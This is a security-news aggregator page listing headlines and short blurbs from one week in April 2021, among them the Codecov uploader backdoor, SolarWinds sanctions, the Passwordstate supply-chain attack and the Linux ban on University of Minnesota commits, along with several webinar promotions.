Sat.Apr 17, 2021 - Fri.Apr 23, 2021

article thumbnail

When cryptography attacks – how TLS helps malware hide in plain sight

Naked Security

No IT technology feels quite as much of a double-edged sword as encryption.

Malware 117
article thumbnail

Privacy and security in the software designing

Security Affairs

The importance of carrying out a careful risk and impact assessment in order to safeguard the security of the information and the data privacy. In order to reduce as much as possible the vulnerabilities and programming errors that can affect not only the quality of the product itself but can also be exploited to launch increasingly sophisticated and growing computer attacks, it’s necessary to guarantee the protection parameters of computer security in terms of integrity, confidentiality and auth

Software 108
Insiders

Sign Up for our Newsletter

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

article thumbnail

Explaining Threats, Threat Actors, Vulnerabilities, and Risk Using a Real-World Scenario

Daniel Miessler

Casey Ellis (of Bugcrowd fame) had a great post on Twitter today about security terminology. Casey also added that Acceptable Risk would be being willing to get punched in the face. threat actor = someone who wants to punch you in the face threat = the punch being thrown vulnerability = your inability to defend against the punch risk = the likelihood of getting punched in the face — cje (@caseyjohnellis) April 19, 2021.

Risk 335
article thumbnail

Backdoor Found in Codecov Bash Uploader

Schneier on Security

Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there. Codecov said the breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.

Hacking 323
article thumbnail

IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.

article thumbnail

Weekly Update 239

Troy Hunt

Geez I'm glad the Facebook stuff was the week before this one! With that (mostly) out of the way, we headed off to Thredbo for a couple of days of mountain biking, hitting trails I've only ever snowboarded down before (yes, we get snow in Australia). Back to normality (I think we can start calling it that now), Rob and I did our book editing session, the Facebook scraping incident (let's stop calling it a "data breach") continued to consume time and in a case of very fortuitous timing, they're c

article thumbnail

Top 5 ways to protect against cryptocurrency scams

Tech Republic Security

As the use of cryptocurrency increases, so does the risk of being a target for scammers. Tom Merritt offers five tips for defending against cryptocurrency scams.

More Trending

article thumbnail

Biden Administration Imposes Sanctions on Russia for SolarWinds

Schneier on Security

On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks. I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations.

Hacking 310
article thumbnail

Carbanak and FIN7 Attack Techniques

Trend Micro

What happens in Carbanak and FIN7 attacks? Here are some techniques used by these financially motivated threat groups that target banks, retail stores, and other establishments.

Retail 145
article thumbnail

Baseball and cybersecurity have more in common than you think

Tech Republic Security

A former pro baseball player and coach turned sports psychologist believes there is much cybersecurity pros can learn from sports mental conditioning. He wants to help them hit more home runs.

article thumbnail

Major Cyber Attacks that took place so far in 2021

CyberSecurity Insiders

Microsoft Exchange Server Cyber Attack- Cyber Threat actors somehow infiltrated the email servers of Microsoft Exchange operating across the world through a vulnerability and accessed data of many government and private companies. Later, the Satya Nadella led company issued a statement that it could be the work of a Chinese Hacking group named Hafinium.

article thumbnail

Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.

article thumbnail

Details on the Unlocking of the San Bernardino Terrorist’s iPhone

Schneier on Security

The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security. Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be

Software 285
article thumbnail

Navigating Cybersecurity Gaps in Uncertain Times

Security Boulevard

If cybersecurity leaders and teams think this year will be quieter and easier than 2020, they are mistaken. The remote work trend launched by COVID-19 is morphing into a new hybrid environment that has some employees working at home full time, others at corporate facilities and many working at either location depending on the day. The post Navigating Cybersecurity Gaps in Uncertain Times appeared first on Security Boulevard.

article thumbnail

Business and operations leaders are building digital trust through partnerships

Tech Republic Security

Organizations are increasing investments in cybersecurity and their dependence on third parties—even in light of disruptions, according to PwC's Cyber Trust report.

article thumbnail

How to keep your Android device immune to malicious vaccine themed apps

Hot for Security

The bad news. Attackers are exploiting the COVID-19 vaccine apps to deploy malware to Android devices. Since the outburst of the pandemic, they haven’t missed any opportunity to spread malware via Covid19-themed emails, apps, websites and social media. But now, Bitdefender researchers have found multiple apps taking advantage of mobile users looking for information about the vaccines or seeking an appointment to get the jab.

Adware 145
article thumbnail

Software Composition Analysis: The New Armor for Your Cybersecurity

Speaker: Blackberry, OSS Consultants, & Revenera

Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?

article thumbnail

On North Korea’s Cyberattack Capabilities

Schneier on Security

Excellent New Yorker article on North Korea’s offensive cyber capabilities.

article thumbnail

Linux bans University of Minnesota for committing malicious code

Bleeping Computer

Linux kernel project maintainers have imposed a ban on the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits, or patches that deliberately introduced security vulnerabilities in the official Linux project. [.].

Software 145
article thumbnail

Parrot OS Security edition is a Linux desktop distribution geared for security admins

Tech Republic Security

Security professionals would be well-served with this Linux distribution that offers a wide range of penetration and vulnerability testing tools.

197
197
article thumbnail

6 Cybersecurity Tips for Working from Home

Security Boulevard

Here at Tripwire, we, like many others, recently surpassed the one-year anniversary of working from home due to the COVID-19 pandemic. Since March of 2020, we have converted kitchens, spare bedrooms and garages into office spaces. Our pets and children have become our coworkers, and companies are reporting a sudden increase in shirt sales as […]… Read More.

article thumbnail

From Complexity to Clarity: Strategies for Effective Compliance and Security Measures

Speaker: Erika R. Bales, Esq.

When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any other number of other things - and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be able to be distilled down to a checklist.

article thumbnail

120 Compromised Ad Servers Target Millions of Internet Users

The Hacker News

An ongoing malvertising campaign tracked as "Tag Barnakle" has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware.

Internet 145
article thumbnail

Major BGP leak disrupts thousands of networks globally

Bleeping Computer

A large BGP routing leak that occurred last night disrupted the connectivity for thousands of major networks and websites around the world. Although the BGP routing leak occurred in Vodafone's autonomous network (AS55410) based in India, it has impacted U.S. companies, including Google, according to sources. [.].

145
145
article thumbnail

The boom in collaboration software creates extra security risks

Tech Republic Security

While the software solutions have made it easier to work from home, they've also made it easier to launch malware.

Software 210
article thumbnail

Diversity in the Cybersecurity Workforce

Security Boulevard

Like most technology workforce segments, the cybersecurity diversity issue is a very acute problem: there simply isn’t nearly enough representation of diverse backgrounds in cybersecurity roles, from security operations center (SOC) analysts all the way up through enterprise-level CISOs and board members. Erkang Zheng, founder and CEO of JupiterOne, said the primary issue that comes.

article thumbnail

Successful Change Management with Enterprise Risk Management

Speaker: William Hord, Vice President of ERM Services

A well-defined change management process is critical to minimizing the impact that change has on your organization. Leveraging the data that your ERM program already contains is an effective way to help create and manage the overall change management process within your organization. Your ERM program generally assesses and maintains detailed information related to strategy, operations, and the remediation plans needed to mitigate the impact on the organization.

article thumbnail

WhatsApp in pink? Watch out for this fake update

We Live Security

The malware sends automated replies to messages on WhatsApp and other major chat apps. The post WhatsApp in pink? Watch out for this fake update appeared first on WeLiveSecurity.

Malware 143
article thumbnail

Passwordstate password manager hacked in supply chain attack

Bleeping Computer

Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. [.].

article thumbnail

Apple supplier Quanta hit with $50 million ransomware attack from REvil

Tech Republic Security

Hackers claim to have infiltrated the networks of Quanta Computer Inc., which makes Macbooks and hardware for HP, Facebook and Google.

article thumbnail

U.S. Takes Aim at Russia’s Cyber Ops Ecosystem

Security Boulevard

The Biden administration is taking the Russian cyber operations ecosystem to task with sanctions pointed at both established Russian companies as well as Russian-controlled entities created by the FSB, GRU and SVR for operational purposes. Coupled with the U.S. Treasury sanctions, a joint advisory from CISA, NSA and the FBI identified the SVR (Russian Foreign.

Risk 145
article thumbnail

Cover Your SaaS: How to Overcome Security Challenges and Risks For Your Organization

Speaker: Ronald Eddings, Cybersecurity Expert and Podcaster

So, you’ve accomplished an organization-wide SaaS adoption. It started slow, and now just a few team members might be responsible for running Salesforce, Slack, and a few others applications that boost productivity, but it’s all finished. Or is it? Through all the benefits offered by SaaS applications, it’s still a necessity to onboard providers as quickly as possible.

article thumbnail

Apple AirDrop Flaws Could Let Hackers Grab Users’ Phone Numbers and Email Addresses

Hot for Security

Users of Apple products have long loved the ability to wirelessly share files with each other, using AirDrop to transmit files between their iPhones and Macbooks. But researchers at the Technical University of Darmstadt in Germany have discovered that security weaknesses could allow an attacker to obtain a victim’s phone number and even email address.

Wireless 144
article thumbnail

World Book Day: Cybersecurity’s Quietest Celebration

The State of Security

The last time you were in a library, or a bookstore, you probably noticed how quiet it was. This doesn’t mean that people weren’t excited, or downright celebrating, they were engaged in a different method of celebration; the kind that takes place between the covers of a good book. April 23rd marks the celebration of […]… Read More. The post World Book Day: Cybersecurity’s Quietest Celebration appeared first on The State of Security.

article thumbnail

After Virginia passes new privacy law, states race to catch up to CCPA and GDPR

Tech Republic Security

Using Washington State's proposed law as a guide, New York, Texas and many other states are inching their way toward a data privacy law.

article thumbnail

Ransomware 2021 has evolved. Are you keeping up with network security?

Security Boulevard

As we head deeper into 2021, it’s beginning to feel like there’s a light at the end of the tunnel and we can all take a deep breath. 2020 was a tumultuous year, one marked by a global pandemic, natural disasters and civil unrest. Last year also saw record number cybercrime complaints, with the FBI […]. The post Ransomware 2021 has evolved. Are you keeping up with network security?

article thumbnail

How Preparation and Strategy Can Be Used to Fight and Defeat Any Ransomware Attack

Speaker: Karl Camilleri, Cloud Services Product Manager at phoenixNAP

Did you know that 2021 was a record-breaking year for ransomware? The days of a “once in a while” attack against businesses and organizations are over. Cyberthreats have become a serious issue. With 495.1 million attacks, the threat marked a 148% increase compared to 2020 and was the most expensive year on record! As a result, data protection needs to be a concern for most banks, businesses, and information technology specialists.